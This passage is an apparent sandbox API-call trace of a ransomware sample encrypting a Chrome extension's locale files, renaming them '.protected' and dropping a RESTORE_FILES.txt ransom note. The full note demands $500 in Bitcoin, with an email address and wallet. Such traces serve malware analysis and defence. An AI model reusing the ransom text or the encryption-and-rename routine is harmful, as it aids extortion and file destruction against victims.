Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json") returned 155 [0079.015] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.015] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json") returned 155 [0079.015] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.015] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0079.016] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.016] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0079.016] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.016] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.016] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.016] CloseHandle (hObject=0x168) returned 1 [0079.016] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.protected") returned 165 [0079.017] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.protected")) returned 1 [0079.017] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.017] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.017] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\RESTORE_FILES.txt") returned 159 [0079.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.017] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.018] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.018] lstrlenA (lpString="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") returned 684 [0079.018] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.018] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.018] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.018] CloseHandle (hObject=0x164) returned 1 [0079.019] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.019] lstrcmpiW (lpString1="ko", lpString2="Windows") returned -1 [0079.019] lstrcmpiW (lpString1="ko", lpString2="Program Files") returned -1 [0079.019] lstrcmpiW (lpString1="ko", lpString2="Program Files (x86)") returned -1 [0079.019] lstrcmpiW (lpString1="ko", lpString2="$Recycle.bin") returned 1 [0079.019] lstrcmpiW (lpString1="ko", lpString2="System Volume Information") returned -1 [0079.019] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko") returned 141 [0079.019] lstrcmpW (lpString1="ko", lpString2=".") returned 1 [0079.019] lstrcmpW (lpString1="ko", lpString2="..") returned 1 [0079.019] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\*") returned 143 [0079.019] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.019] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.019] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.019] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.019] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.019] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.019] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\.") returned 143 [0079.019] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.019] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.019] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.019] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.019] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.019] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.019] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.019] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\..") returned 144 [0079.019] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.019] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.019] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.019] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.020] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.020] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0079.020] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.020] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.020] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0079.020] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.020] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.020] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.020] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.020] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0079.020] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.020] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0079.020] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.020] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json") returned 155 [0079.020] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.020] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xda, lpOverlapped=0x0) returned 1 [0079.021] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.021] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xda, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xda, lpOverlapped=0x0) returned 1 [0079.021] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.021] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.021] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.021] CloseHandle (hObject=0x168) returned 1 [0079.021] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.protected") returned 165 [0079.021] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.protected")) returned 1 [0079.022] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.022] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.022] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\RESTORE_FILES.txt") returned 159 [0079.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.022] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.022] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.023] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.023] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.023] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.023] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.023] CloseHandle (hObject=0x164) returned 1 [0079.023] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.023] lstrcmpiW (lpString1="lt", lpString2="Windows") returned -1 [0079.023] lstrcmpiW (lpString1="lt", lpString2="Program Files") returned -1 [0079.023] lstrcmpiW (lpString1="lt", lpString2="Program Files (x86)") returned -1 [0079.023] lstrcmpiW (lpString1="lt", lpString2="$Recycle.bin") returned 1 [0079.023] lstrcmpiW (lpString1="lt", lpString2="System Volume Information") returned -1 [0079.023] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt") returned 141 [0079.023] lstrcmpW (lpString1="lt", lpString2=".") returned 1 [0079.023] lstrcmpW (lpString1="lt", lpString2="..") returned 1 [0079.023] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\*") returned 143 [0079.023] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.023] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.024] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.024] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.024] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.024] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.024] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\.") returned 143 [0079.024] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.024] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.024] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.024] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.024] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.024] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.024] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.024] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\..") returned 144 [0079.024] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.024] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.024] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.024] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.024] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.024] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.024] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.024] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.024] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0079.024] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.024] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.024] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.024] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0079.025] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0079.025] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0079.025] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.025] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe4, lpOverlapped=0x0) returned 1 [0079.026] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.026] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe4, lpOverlapped=0x0) returned 1 [0079.026] SetFilePointerEx (in: hFile=0x168, 
